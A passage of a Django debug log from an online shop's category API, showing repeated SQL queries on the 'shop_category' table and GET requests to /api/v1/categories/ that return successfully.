"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 14:17:14,547 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 14:17:14,552 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 14:17:14,557 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 14:17:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 14:17:29,206 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 14:17:29,220 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 14:17:29,226 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 14:17:29,230 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 14:17:29,236 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 14:17:29,241 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 14:17:29,245 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 14:17:29,250 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 14:17:29,254 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 14:17:29,260 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 14:17:29,264 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 14:17:29,268 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 14:17:29,272 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 14:17:29,276 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 14:17:29,282 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 14:17:29,286 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 14:17:29,290 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 14:17:29,294 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 14:17:29,299 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 14:17:29,306 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 14:17:29,310 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 14:17:29,314 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 14:17:29,318 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 14:17:29,322 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 14:17:29,326 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 14:17:29,332 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 14:17:29,336 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 14:17:29,340 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 14:17:29,344 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 14:17:29,348 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 14:17:29,353 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 14:17:29,357 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 14:17:29,361 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 14:17:29,365 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 14:17:29,369 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 14:17:29,377 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 14:17:29,381 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 14:17:29,390 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 14:17:29,395 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 14:17:29,399 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 14:17:29,403 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 14:17:29,408 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 14:17:29,414 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 14:17:29,418 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 14:17:29,422 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 14:17:29,427 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [18/Dec/2019 14:17:29] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 14:17:29,433 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 14:17:29,437 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 14:17:29] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 14:17:36,423 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 14:17:36,440 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 14:17:36,449 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 14:17:36,451 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 14:17:36,454 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-18 14:17:36,458 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 14:17:36,460 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 14:17:36,463 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 14:17:36,466 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 14:17:36,468 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 14:17:36,471 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [18/Dec/2019 14:17:36] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-18 14:17:36,475 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 14:17:36,477 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 14:17:36,479 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 14:17:36,482 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 14:17:36,484 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" 